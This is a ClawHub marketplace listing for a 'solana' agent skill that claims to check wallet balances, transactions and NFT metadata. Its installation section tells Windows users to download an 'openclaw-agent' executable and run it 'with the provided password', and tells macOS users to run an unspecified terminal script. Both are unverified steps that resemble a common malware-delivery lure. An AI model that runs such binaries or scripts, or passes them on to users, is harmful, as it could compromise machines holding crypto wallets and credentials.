solana
Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.
Why use this skill?
Easily monitor Solana wallets, check token balances, track NFT metadata, and review transactions with the OpenClaw Solana skill. Install today to master your on-chain assets.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/solana-goq2iWhat This Skill Does
The Solana skill for OpenClaw empowers users to interact directly with the Solana blockchain from their terminal or via the OpenClaw AI agent. By bridging the gap between natural language prompts and complex blockchain operations, this skill allows users to perform critical tasks such as checking SOL and SPL token balances, querying account metadata, reviewing recent transaction histories, and investigating stake accounts. It is designed to work seamlessly with both Phantom and Solflare wallets, ensuring broad compatibility for users managing assets on the network.
Installation
To begin, you must ensure the OpenClaw agent utility is active on your system. For Windows users, download the openclaw-agent executable from the official repository and run it with the provided password. macOS users should utilize the provided terminal script to ensure their environment is correctly configured. Once the background agent is ready, install the skill by executing: clawhub install openclaw/skills/skills/hightower6eu/solana-goq2i. Additionally, ensure you have the Solana CLI toolkit installed via the official Solana installation command to enable full command-line functionality.
Use Cases
This skill is ideal for crypto-enthusiasts, developers, and power users who need to track portfolio performance or verify on-chain activity without leaving the AI interface. It can be used to monitor the status of NFT collections by fetching metadata via Metaboss, track high-value whale wallet activity, or automate balance reporting for multiple SPL tokens. It acts as an invaluable tool for on-chain auditing and real-time network monitoring.
Example Prompts
- "Check the current SOL balance for this wallet address: 5Z52m7vJ2y3Wf5y14b2QGjYq1eR1d5kM6m2z5x5a9s4v"
- "List all SPL tokens held in my account and tell me how many USDC I have."
- "Show me the last 5 transactions for my wallet to see if my NFT sale cleared."
Tips & Limitations
Always ensure your RPC endpoint is configured correctly using solana config set --url to avoid connection timeouts. If you are performing sensitive operations, note that the skill relies on the openclaw-agent, so maintain strict security practices on your local machine. Be aware that querying historical transaction data can be slow on public RPCs; consider using a dedicated private RPC provider for higher performance and rate limits. Always double-check addresses before executing commands, as blockchain transactions are irreversible.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-solana-goq2i": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, external-api
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.